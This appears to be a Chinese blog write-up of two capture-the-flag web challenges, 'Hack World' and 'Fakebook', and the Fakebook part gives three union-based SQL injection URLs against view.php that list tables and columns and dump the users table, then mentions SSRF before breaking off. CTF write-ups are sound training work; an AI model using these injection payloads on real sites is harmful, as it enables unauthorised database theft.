# [CISCN2019 华北赛区 Day2 Web1] Hack World

# 盲注:脚本

# [网鼎杯 2018] Fakebook

先用 dirsearch 扫一遍,有一个 robots.txt,里面有个文件,直接打开下载源码,发现

image-20240427123209441

先注册吧,注册进去有个超链接的名字点进去

image-20240427123321011

有参数可以注入,sql 注入,发现是数字型,且在第二个数字这里有回显,直接可以注入,找表,列,以及数据

/view.php?no=0 union//select 1,group_concat (table_name),3,4 from information_schema.tables where table_schema=’fakebook’–+ 得到表名

user/view.php?no=0 union//select 1,group_concat (column_name),3,4 from information_schema.columns where table_schema=’fakebook’ and table_name=’users’–+ 得到列名

/view.php?no=0 union/**/select 1,group_concat (no,username,passwd,data),3,4 from fakebook.users –+ 得到数据

发现数据中有个序列化的数据

image-20240427123819254

与下载文件重合 name,blog,age 这三个都是那个文件的参数,这里我们并没有得到 flag,而是我们个人资料的反序列化数据,因为在数据中存在我们的博客地址,所以我们尝试使用 ssrf 读取 flag,但是我们并不知道 flag 所在文件夹,用 dirsearch 扫描发现 flag.php 和 robots.txt

知识点:ssrf 漏洞:

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal